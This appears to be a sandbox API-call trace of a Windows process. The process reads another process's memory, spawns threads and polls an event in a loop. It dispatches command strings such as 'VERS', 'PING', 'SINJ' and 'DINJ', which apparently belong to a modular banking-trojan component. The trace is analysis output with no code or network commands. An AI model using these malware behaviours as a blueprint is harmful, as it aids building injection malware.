	[0188.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22ca898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35
	[0188.455] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x50) returned 0x22aa438
	[0188.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22ca898, cbMultiByte=-1, lpWideCharStr=0x22aa438, cchWideChar=35 | out: lpWideCharStr="Build date: Apr 30 2019 18:51:16\r\n") returned 35
	[0188.455] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xedf76c, lpBuffer=0x2256c0, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2256c0*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0188.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2256c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0188.455] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263438
	[0188.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2256c0, cbMultiByte=-1, lpWideCharStr=0x263438, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0188.455] SetEvent (hEvent=0x474) returned 1
	[0188.460] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225390) returned 1
	[0188.460] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ca898) returned 1
	[0188.460] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2256c0) returned 1
	[0188.460] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263460
	[0188.460] lstrcmpiW (lpString1="VERS", lpString2="ModuleQuery") returned 1
	[0188.460] lstrcmpiW (lpString1="VERS", lpString2="WantRelease") returned -1
	[0188.460] lstrcmpiW (lpString1="VERS", lpString2="VERS") returned 0
	[0188.460] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad390
	[0188.460] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0188.460] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x23078c0, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xa38) returned 0x460
	[0188.461] Sleep (dwMilliseconds=0xbb8) 
	[0188.464] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263528
	[0188.464] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.464] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263528) returned 1
	[0188.464] Sleep (dwMilliseconds=0xbb8) 
	[0188.480] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263528
	[0188.480] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.480] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263528) returned 1
	[0188.480] Sleep (dwMilliseconds=0xbb8) 
	[0188.496] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263528
	[0188.496] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.496] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263528) returned 1
	[0188.496] Sleep (dwMilliseconds=0xbb8) 
	[0188.511] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263528
	[0188.512] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.512] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263528) returned 1
	[0188.512] Sleep (dwMilliseconds=0xbb8) 
	[0188.582] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2636e0
	[0188.582] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0188.582] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2243a0
	[0188.582] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x22ca628
	[0188.582] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2256c0
	[0188.582] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0188.582] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x2243a0, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2243a0*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0188.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2243a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0188.583] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff378
	[0188.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2243a0, cbMultiByte=-1, lpWideCharStr=0x22ff378, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0188.583] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x22ca628, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x22ca628, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0188.583] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x2256c0, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2256c0*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0188.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2256c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0188.583] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263640
	[0188.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2256c0, cbMultiByte=-1, lpWideCharStr=0x263640, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0188.583] SetEvent (hEvent=0x474) returned 1
	[0188.583] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2243a0) returned 1
	[0188.583] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ca628) returned 1
	[0188.583] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2256c0) returned 1
	[0188.583] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263690
	[0188.583] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0188.583] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0188.583] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0188.583] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0188.583] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0188.583] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff390
	[0188.583] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x2636e0, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0x738) returned 0x4c8
	[0188.584] Sleep (dwMilliseconds=0xbb8) 
	[0188.589] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2636b8
	[0188.589] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.589] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2636b8) returned 1
	[0188.589] Sleep (dwMilliseconds=0xbb8) 
	[0188.605] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2636b8
	[0188.605] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.605] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2636b8) returned 1
	[0188.605] Sleep (dwMilliseconds=0xbb8) 
	[0188.620] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2636b8
	[0188.620] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.620] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2636b8) returned 1
	[0188.620] Sleep (dwMilliseconds=0xbb8) 
	[0188.636] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2639b0
	[0188.636] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.636] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2639b0) returned 1
	[0188.636] Sleep (dwMilliseconds=0xbb8) 
	[0188.657] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2639b0
	[0188.657] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.657] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2639b0) returned 1
	[0188.657] Sleep (dwMilliseconds=0xbb8) 
	[0188.667] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2639b0
	[0188.667] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.667] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2639b0) returned 1
	[0188.667] Sleep (dwMilliseconds=0xbb8) 
	[0188.683] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0188.683] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.683] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0188.683] Sleep (dwMilliseconds=0xbb8) 
	[0188.726] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0188.726] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.726] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0188.726] Sleep (dwMilliseconds=0xbb8) 
	[0188.731] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0188.731] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.731] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0188.731] Sleep (dwMilliseconds=0xbb8) 
	[0188.745] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0188.745] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.745] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0188.745] Sleep (dwMilliseconds=0xbb8) 
	[0188.761] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0188.761] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.761] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0188.761] Sleep (dwMilliseconds=0xbb8) 
	[0188.776] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0188.777] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.777] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0188.777] Sleep (dwMilliseconds=0xbb8) 
	[0188.792] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0188.792] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.792] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0188.792] Sleep (dwMilliseconds=0xbb8) 
	[0188.807] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0188.807] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.808] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0188.808] Sleep (dwMilliseconds=0xbb8) 
	[0188.823] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0188.823] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.823] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0188.823] Sleep (dwMilliseconds=0xbb8) 
	[0188.839] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0188.839] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.839] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0188.839] Sleep (dwMilliseconds=0xbb8) 
	[0188.855] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0188.855] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.855] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0188.855] Sleep (dwMilliseconds=0xbb8) 
	[0188.871] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0188.871] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.871] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0188.871] Sleep (dwMilliseconds=0xbb8) 
	[0188.886] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0188.887] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.887] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0188.887] Sleep (dwMilliseconds=0xbb8) 
	[0188.903] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0188.903] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.903] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0188.903] Sleep (dwMilliseconds=0xbb8) 
	[0188.917] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0188.917] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.917] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0188.917] Sleep (dwMilliseconds=0xbb8) 
	[0188.945] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0188.945] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.945] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0188.945] Sleep (dwMilliseconds=0xbb8) 
	[0188.948] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0188.948] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.948] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0188.948] Sleep (dwMilliseconds=0xbb8) 
	[0188.963] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0188.963] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.963] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0188.964] Sleep (dwMilliseconds=0xbb8) 
	[0188.980] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0188.981] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.981] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0188.981] Sleep (dwMilliseconds=0xbb8) 
	[0188.995] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0188.995] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.995] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0188.995] Sleep (dwMilliseconds=0xbb8) 
	[0189.011] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.011] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.011] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.011] Sleep (dwMilliseconds=0xbb8) 
	[0189.026] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.026] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.026] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.026] Sleep (dwMilliseconds=0xbb8) 
	[0189.042] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.042] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.042] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.042] Sleep (dwMilliseconds=0xbb8) 
	[0189.060] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.060] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.060] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.060] Sleep (dwMilliseconds=0xbb8) 
	[0189.073] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.073] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.073] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.073] Sleep (dwMilliseconds=0xbb8) 
	[0189.088] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.088] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.089] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.089] Sleep (dwMilliseconds=0xbb8) 
	[0189.104] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.104] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.104] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.104] Sleep (dwMilliseconds=0xbb8) 
	[0189.120] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.120] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.120] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.120] Sleep (dwMilliseconds=0xbb8) 
	[0189.135] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.135] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.135] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.135] Sleep (dwMilliseconds=0xbb8) 
	[0189.151] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.151] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.151] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.151] Sleep (dwMilliseconds=0xbb8) 
	[0189.167] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.167] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.167] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.167] Sleep (dwMilliseconds=0xbb8) 
	[0189.186] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.187] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.187] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.187] Sleep (dwMilliseconds=0xbb8) 
	[0189.198] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.198] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.198] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.198] Sleep (dwMilliseconds=0xbb8) 
	[0189.213] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.213] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.214] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.214] Sleep (dwMilliseconds=0xbb8) 
	[0189.230] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.230] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.230] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.230] Sleep (dwMilliseconds=0xbb8) 
	[0189.252] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.252] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.252] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.252] Sleep (dwMilliseconds=0xbb8) 
	[0189.260] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.260] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.260] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.260] Sleep (dwMilliseconds=0xbb8) 
	[0189.276] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.276] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.276] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.276] Sleep (dwMilliseconds=0xbb8) 
	[0189.292] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.292] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.292] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.292] Sleep (dwMilliseconds=0xbb8) 
	[0189.307] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.307] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.307] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.307] Sleep (dwMilliseconds=0xbb8) 
	[0189.323] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.323] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.323] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.323] Sleep (dwMilliseconds=0xbb8) 
	[0189.338] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.338] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.338] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.338] Sleep (dwMilliseconds=0xbb8) 
	[0189.354] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.354] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.354] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.354] Sleep (dwMilliseconds=0xbb8) 
	[0189.370] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.370] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.370] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.370] Sleep (dwMilliseconds=0xbb8) 
	[0189.385] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.385] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.385] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.385] Sleep (dwMilliseconds=0xbb8) 
	[0189.401] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.401] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.401] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.402] Sleep (dwMilliseconds=0xbb8) 
	[0189.416] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.416] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.416] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.416] Sleep (dwMilliseconds=0xbb8) 
	[0189.432] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.432] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.432] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.432] Sleep (dwMilliseconds=0xbb8) 
	[0189.447] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.447] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.447] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.447] Sleep (dwMilliseconds=0xbb8) 
	[0189.464] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.464] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.464] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.465] Sleep (dwMilliseconds=0xbb8) 
	[0189.501] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0189.501] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0189.501] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263aa0) returned 1
	[0189.501] Sleep (dwMilliseconds=0xbb8) 
